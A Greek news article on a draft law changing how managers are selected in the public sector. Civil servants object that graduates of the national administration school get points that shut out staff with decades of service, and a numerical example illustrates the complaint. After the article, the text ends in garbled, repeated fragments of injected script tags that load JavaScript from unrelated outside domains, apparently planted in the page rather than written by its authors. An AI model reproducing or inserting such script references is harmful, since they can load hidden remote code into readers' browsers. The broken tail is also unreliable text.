«Ανω-κάτω» το Δημόσιο με τις νέες επιλογές των διευθυντών

Για μία θέση προϊσταμένου στο Δημόσιο… Αναβρασμός στη δημόσια διοίκηση για το νέο σύστημα επιλογής προϊσταμένων.Κόβεται ο δρόμος για την εξέλιξη έμπειρων υπαλλήλων.

Αναταραχή επικρατεί στους δημοσίους υπαλλήλους με το νέο σύστημα επιλογής προϊσταμένων που περιγράφεται στο σχέδιο νόμου που αναμένεται να κατατεθεί τις επόμενες ημέρες στην βουλή από τον αναπληρωτή υπουργό Διοικητικής Ανασυγκρότησης Χ. Βερναρδάκη.

Σύμφωνα με καταγγελίες στελεχών της Δημόσιας Διοίκησης με το σχέδιο νόμου πριμοδοτούνται «προκλητικά» οι 2.000 απόφοιτοι των Σχολών Δημόσιας Διοίκησης και Αυτοδιοίκησης με αποτέλεσμα ναείναι απαγορευτικό να διεκδικήσουν θέση ευθύνης έμπειροι υπάλληλοι με πολλά χρόνια προϋπηρεσίας. Οι ίδιες πηγές σημειώνουν ότι με τις προβλέψεις του νόμου δίνεται οι δυνατότητα σε νεοεισερχόμενους υπαλλήλους – αποφοίτους της ΕΣΔΔΑ- να διεκδικήσουν θέσεις προϊσταμένων και διευθυντών, ενώ αποκλείονται από τις επιλογές εργαζόμενοι με 20-25 χρόνια προϋπηρεσίας οι οποίοι δεν μπορούν να ξεπεράσουν τα μόρια που «έχουν λαμβάνειν» οι απόφοιτοι της ΕΣΔΔΑ.

Υπογραμμίζουν δε ότι η επιλογή νέων υπαλλήλων σε θέσεις ευθύνης θα μπλοκάρει για μία ακόμη φορά τα γρανάζια της κρατικής μηχανής αφού αναμένεται να δαπανήσουν σημαντικό χρονικό διάστημα για να επιβληθούν σε ένα Δημόσιο όπου ο μοναδικός στόχος των εργαζομένων είναι να διεκδικήσουν μία θέση ευθύνης και τα επιδόματα που απορρέουν από αυτήν την εξέλιξη.

Απόφοιτος ΕΣΔΑΑ VS υπάλληλος με 18 χρόνια προϋπηρεσίας 

Σύμφωνα με τον νόμο που θα κατατεθεί στην βουλή τις επόμενες ημέρες ένας υπάλληλος που έχει τρία χρόνια προϋπηρεσίας και έχει υπηρετήσει ως προϊστάμενος τμήματος με τα προηγούμενα μεταβατικά συστήματα επιλογής προϊσταμένων ή κατέχουν τον βαθμό Α και έχουν αποφοιτήσει από την Εθνική Σχολή Δημόσιας Διοίκησης και Αυτοδιοίκησης μπορεί να διεκδικήσει θέση προϊσταμένου τμήματος αφού:

  • Εισάγεται στον βαθμό Β με την εκκίνηση της εργασίας του στο Δημόσιο δηλαδή κερδίζει 7 χρόνια στο βαθμολόγιο όπου με τις νέες διατάξεις διαχωρίζεται από το μισθολόγιο και αφορά μόνο την εξέλιξη του υπαλλήλου. Ένας απόφοιτος της ΕΣΔΔΑ για να καταταχθεί στον Βαθμό Α και να διεκδικήσει θέση ευθύνης πρέπει να έχει μόλις 6 χρόνια προϋπηρεσία. Παράλληλα για την επιλογή προϊσταμένων, στην μοριοδότηση των τυπικών προσόντων ο συγκεκριμένος υπάλληλος εκτός της συνέντευξης και των αξιολογήσεων, λαμβάνει 250 μόρια για την επιτυχή αποφοίτηση της από την Σχολή, 200 μόρια λόγω προϋπηρεσίας, 100 μόρια για τον βασικό τίτλο σπουδών από ελληνικό πανεπιστήμιο. Έτσι λαμβάνει τελικώς 550 μόρια μόνο από την Σχολή και τα χρόνια προϋπηρεσίας
  • Αντίστοιχα υπάλληλος με 15 χρόνια προϋπηρεσίας και μεταπτυχιακό λαμβάνει μόρια 375 μόρια λόγω προϋπηρεσίας και 150 για το μεταπτυχιακό φτάνοντας συνολικά τα  520 μόρια με τα υπερδιπλάσια χρόνια προϋπηρεσίας. Υποθέτοντας ότι οι δύο υπάλληλοι έχουν την ίδια βαθμολογία στα υπόλοιπα κριτήρια είναι φανερό από το παράδειγμα ότι η μοριοδότηση των αποφοίτων ΕΣΔΑΑ …μπλοκάρει την εξέλιξη υπαλλήλων με διπλάσια ή και τριπλάσια προϋπηρεσία και με αντίστοιχα εκπαιδευτικά προσόντα.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>